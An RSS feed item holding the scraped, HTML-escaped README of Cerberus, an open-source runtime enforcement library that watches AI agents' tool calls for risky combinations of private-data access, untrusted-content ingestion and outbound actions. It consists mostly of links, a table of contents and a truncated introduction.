&lt;a href="https://pypi.org/project/cerberus-ai/" rel="nofollow noopener noreferrer"&gt;&lt;img src="https://camo.githubusercontent.com/5bb547770ad694cb04cbe72536008202bdec02fecb4f29dd722fc4fed1c9b805/68747470733a2f2f696d672e736869656c64732e696f2f707970692f762f63657262657275732d61692e737667" alt="PyPI version"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Embeddable runtime enforcement for AI agents. Cerberus correlates privileged data access, untrusted content ingestion, and outbound behavior at the tool-call level, then interrupts guarded outbound actions before they execute.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://cerberus.sixsenseenterprise.com" rel="nofollow noopener noreferrer"&gt;&lt;strong&gt;Docs&lt;/strong&gt;&lt;/a&gt; · &lt;a href="https://www.npmjs.com/package/@cerberus-ai/core" rel="nofollow noopener noreferrer"&gt;&lt;strong&gt;npm&lt;/strong&gt;&lt;/a&gt; · &lt;a href="https://pypi.org/project/cerberus-ai/" rel="nofollow noopener noreferrer"&gt;&lt;strong&gt;PyPI&lt;/strong&gt;&lt;/a&gt; · &lt;a href="https://github.com/Odingard/cerberus/mailto:enterprise@sixsenseenterprise.com" rel="noopener noreferrer"&gt;&lt;strong&gt;Enterprise&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;


&lt;/div&gt;
&lt;br&gt;


&lt;div class="markdown-alert markdown-alert-note"&gt;
&lt;p class="markdown-alert-title"&gt;Note&lt;/p&gt;
&lt;p&gt;Cerberus is the agentic AI security layer of &lt;a href="https://www.sixsenseenterprise.com" rel="nofollow noopener noreferrer"&gt;Six Sense Enterprise Services&lt;/a&gt;. The core detection library (&lt;code&gt;@cerberus-ai/core&lt;/code&gt;) is MIT licensed and free. The &lt;a href="https://github.com/Odingard/cerberus#-enterprise--self-hosted" rel="noopener noreferrer"&gt;Enterprise edition&lt;/a&gt; adds a self-hosted Gateway, Grafana monitoring stack, and production deployment tooling for teams running AI agents in production.&lt;/p&gt;
&lt;/div&gt;




&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;Table of Contents&lt;/h2&gt;
&lt;/div&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/Odingard/cerberus#-what-is-cerberus" rel="noopener noreferrer"&gt;🎯 What is Cerberus?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Odingard/cerberus#-in-action" rel="noopener noreferrer"&gt;🎬 In Action&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Odingard/cerberus#-what-it-detects" rel="noopener noreferrer"&gt;✨ What It Detects&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Odingard/cerberus#-editions" rel="noopener noreferrer"&gt;📦 Editions&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Odingard/cerberus#-quickstart" rel="noopener noreferrer"&gt;🚀 Quickstart&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Odingard/cerberus#-empirical-results" rel="noopener noreferrer"&gt;📊 Empirical Results&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Odingard/cerberus#%EF%B8%8F-architecture" rel="noopener noreferrer"&gt;🏗️ Architecture&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Odingard/cerberus#owasp-alignment" rel="noopener noreferrer"&gt;OWASP Alignment&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Odingard/cerberus#-framework-integrations" rel="noopener noreferrer"&gt;🔌 Framework Integrations&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Odingard/cerberus#-performance" rel="noopener noreferrer"&gt;⚡ Performance&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Odingard/cerberus#%EF%B8%8F-roadmap" rel="noopener noreferrer"&gt;🗺️ Roadmap&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Odingard/cerberus#%EF%B8%8F-honest-limitations" rel="noopener noreferrer"&gt;⚠️ Honest Limitations&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/Odingard/cerberus#-license" rel="noopener noreferrer"&gt;📜 License&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;




&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;🎯 What is Cerberus?&lt;/h2&gt;
&lt;/div&gt;

&lt;p&gt;Every AI agent that can &lt;strong&gt;(1) access private data, (2) read external content, and (3) send data outbound&lt;/strong&gt;…&lt;/p&gt;
&lt;/div&gt;


&lt;/div&gt;
&lt;br&gt;
  &lt;div class="gh-btn-container"&gt;&lt;a class="gh-btn" href="https://github.com/Odingard/cerberus" rel="noopener noreferrer"&gt;View on GitHub&lt;/a&gt;&lt;/div&gt;
&lt;br&gt;
&lt;/div&gt;



&lt;p&gt;Full methodology, per-payload results, and execution traces are in&lt;br&gt;
docs/research-results.md in the repo. All numbers are reproducible.&lt;br&gt;
&lt;/p&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

</description>
      <category>security</category>
      <category>ai</category>
      <category>typescript</category>
      <category>opensource</category>
    </item>
  </channel>
</rss>
